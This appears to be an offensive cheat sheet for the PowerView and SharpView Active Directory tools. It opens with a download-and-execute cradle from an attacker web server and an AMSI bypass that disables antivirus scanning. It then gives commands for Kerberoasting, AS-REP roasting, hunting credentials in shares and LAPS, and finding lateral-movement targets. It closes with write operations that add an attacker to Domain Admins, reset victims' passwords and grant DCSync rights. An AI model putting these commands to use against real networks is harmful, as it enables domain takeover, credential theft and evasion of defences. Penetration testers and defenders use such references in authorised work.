PowerView / SharpView
aka PowerView, SharpView, PowerSploit, AD Enumeration PowerShell
PowerView and SharpView complete command reference: domain/user/group/computer/GPO/trust/ACL enumeration, Kerberoast and ASREP targets, delegation discovery, LAPS, SPN management, and offensive PowerShell for AD attack chains.
Ports
| Port | Proto | Notes |
|---|---|---|
389 | tcp | LDAP — all PowerView queries |
Fingerprint
- Import-Module ./PowerView.ps1 or load from memory via IEX(New-Object Net.WebClient).DownloadString()
- SharpView.exe mirrors PowerView in C# — runs without PowerShell
Key files
| Path | Holds | Sensitive |
|---|---|---|
PowerView.ps1 | AD enumeration + offensive functions | |
SharpView.exe | C# port of PowerView — bypasses PS logging |
Exploitation primitives
- Get-DomainUser / Get-DomainComputer / Get-DomainGroup cover all object enumeration
- Get-DomainObjectAcl + ResolveGUIDs surfaces ACL abuse paths before running BloodHound
- Find-LocalAdminAccess finds lateral movement targets from current credential
- Invoke-Kerberoast and Get-DomainUser -KerberosPreauthNotRequired enumerate roast targets
Load PowerView
# Disk
Import-Module C:\Tools\PowerView.ps1
# Memory (from attacker web server)
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerView.ps1')
# Bypass execution policy
powershell -ep bypass -c "Import-Module .\PowerView.ps1; Get-DomainUser"
# AMSI bypass first (if AV/EDR active)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Import-Module .\PowerView.ps1# SharpView (no PowerShell needed)
.\SharpView.exe Get-DomainUser -Identity administrator
.\SharpView.exe Find-LocalAdminAccessDomain / Forest Enumeration
# Current domain info
Get-Domain
Get-DomainSID
# Domain controller
Get-DomainController
Get-DomainController -Domain child.domain.local
# Forest info
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog
# Password policy
Get-DomainPolicy
(Get-DomainPolicy).'system access'
# Domain trusts
Get-DomainTrust
Get-DomainTrust -Domain child.domain.local
Get-ForestTrust
Get-DomainTrustMapping # recursive trust mapUser Enumeration
# All domain users
Get-DomainUser | select samaccountname
# Specific user
Get-DomainUser -Identity administrator
# All users with SPNs (Kerberoast targets)
Get-DomainUser -SPN | select samaccountname, serviceprincipalname
# Kerberoastable accounts with active sessions (higher priority)
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat
# ASREP-Roastable accounts
Get-DomainUser -KerberosPreauthNotRequired | select samaccountname
# Users with passwords stored in description/info
Get-DomainUser | Where-Object { $_.description -ne $null } | select samaccountname, description
Get-DomainUser | Where-Object { $_.info -ne $null } | select samaccountname, info
# Disabled accounts
Get-DomainUser -UACFilter ACCOUNTDISABLE | select samaccountname
# Accounts with AdminCount=1 (were/are privileged)
Get-DomainUser -AdminCount | select samaccountname
# Users not requiring password
Get-DomainUser -UACFilter PASSWD_NOTREQD | select samaccountname
# All user attributes
Get-DomainUser -Identity user -Properties *Group Enumeration
# All groups
Get-DomainGroup | select name
# Members of a specific group
Get-DomainGroupMember -Identity 'Domain Admins' -Recurse
# All groups a user is member of
Get-DomainGroup -UserName user | select name
# Groups with AdminCount (privileged)
Get-DomainGroup -AdminCount | select name
# Local groups on a remote machine
Get-NetLocalGroup -ComputerName TARGET
Get-NetLocalGroupMember -ComputerName TARGET -GroupName AdministratorsComputer Enumeration
# All computers
Get-DomainComputer | select dnshostname, operatingsystem
# Windows Server machines only
Get-DomainComputer -OperatingSystem '*Server*' | select dnshostname, operatingsystem
# Unconstrained delegation computers (escalation targets)
Get-DomainComputer -Unconstrained | select dnshostname
# Constrained delegation computers
Get-DomainComputer -TrustedToAuth | select dnshostname, msds-allowedtodelegateto
# Computers in a specific OU
Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=local"
# Ping sweep
Get-DomainComputer -Ping | select dnshostnameGPO Enumeration
# All GPOs
Get-DomainGPO | select displayname, gpcfilesyspath
# GPOs applied to a specific computer
Get-DomainGPO -ComputerIdentity TARGET | select displayname
# Restricted groups via GPO (admin delegation)
Get-DomainGPOLocalGroup | select GPODisplayName, GroupMember
# Find GPOs that add a user as local admin on computers
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity TARGET
# OUs and their linked GPOs
Get-DomainOU | select name, gplinkOU Enumeration
Get-DomainOU | select name, distinguishedname
Get-DomainOU -Identity 'Servers' | %{ Get-DomainComputer -SearchBase $_.distinguishedname }ACL / DACL Enumeration
# ACEs on a specific object
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs
# Find all objects where attacker has interesting rights
$attacker_sid = (Get-DomainUser -Identity attacker).objectsid
Get-DomainObjectAcl -ResolveGUIDs |
Where { $_.SecurityIdentifier -eq $attacker_sid } |
Select ObjectDN, ActiveDirectoryRights
# Find all GenericAll in domain
Get-DomainObjectAcl -ResolveGUIDs |
Where { $_.ActiveDirectoryRights -match "GenericAll" } |
Select ObjectDN, IdentityReference
# Find WriteDACL
Get-DomainObjectAcl -ResolveGUIDs |
Where { $_.ActiveDirectoryRights -match "WriteDacl" } |
Select ObjectDN, IdentityReference
# Check ACL on the domain object (for DCSync rights)
Get-DomainObjectAcl -Identity 'DC=domain,DC=local' -ResolveGUIDs |
Where { $_.ActiveDirectoryRights -match "Replicating|GenericAll|WriteDacl" }Share / File Enumeration
# List shares on a machine
Get-NetShare -ComputerName TARGET
# Find accessible shares across domain
Find-DomainShare -CheckShareAccess
# Find interesting files on accessible shares
Find-InterestingDomainShareFile -Include "*.config","*.xml","*.txt","*.csv","password*","cred*","*.kdbx"
# Find all readable shares
Find-DomainShare
# Files modified in the last 14 days
Find-InterestingDomainShareFile -LastAccessTime (Get-Date).AddDays(-14)Logged-On Users / Sessions
# Who is logged onto a remote machine
Get-NetLoggedon -ComputerName TARGET
# Active sessions on a machine
Get-NetSession -ComputerName TARGET
# Find where a user is logged in across domain
Find-DomainUserLocation -UserIdentity Administrator -Verbose
# Find machines where domain admins are logged in
Find-DomainUserLocation -GroupIdentity 'Domain Admins' -VerboseLocal Admin Discovery
# Find machines where current user has local admin
Find-LocalAdminAccess -Verbose
# Test admin access to specific machine
Test-AdminAccess -ComputerName TARGET
# Find machines where specific user has local admin (via GPO + group)
Find-DomainLocalGroupMember -GroupName AdministratorsDelegation Discovery
# Unconstrained delegation (all types)
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select dnshostname, msds-allowedtodelegateto
Get-DomainUser -Unconstrained | select samaccountname
Get-DomainComputer -Unconstrained | select dnshostname
# Constrained delegation
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select dnshostname, msds-allowedtodelegatetoSPN / Kerberoast Operations
# Enumerate all SPNs
Get-DomainUser -SPN | select samaccountname, serviceprincipalname
# Request TGS tickets for all SPNs (Kerberoasting)
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File tgs.txt
# Set an SPN on a user (GenericWrite abuse)
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/spn'}
# Remove SPN
Set-DomainObject -Identity victim -Clear serviceprincipalnameLAPS
# Check if LAPS is deployed
Get-DomainComputer | Where { $_.'ms-Mcs-AdmPwdExpirationTime' -ne $null } | select dnshostname
# Read LAPS passwords (requires permission)
Get-DomainComputer | select dnshostname, ms-mcs-admpwd, ms-mcs-admpwdexpirationtime
Get-AdmPwdPassword -ComputerName TARGET # LAPS moduleOffensive Write Operations
# Add user to a group (AddMember permission)
Add-DomainGroupMember -Identity 'Domain Admins' -Members attacker
# Change user password (GenericAll / ForceChangePassword)
Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString "NewPass!" -AsPlainText -Force)
# Modify object attribute
Set-DomainObject -Identity victim -Set @{description='modified'}
# Take ownership of an object
Set-DomainObjectOwner -Identity victim -OwnerIdentity attacker
# Add ACE (WriteDACL)
Add-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity attacker -Rights DCSync
# Remove ACE
Remove-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All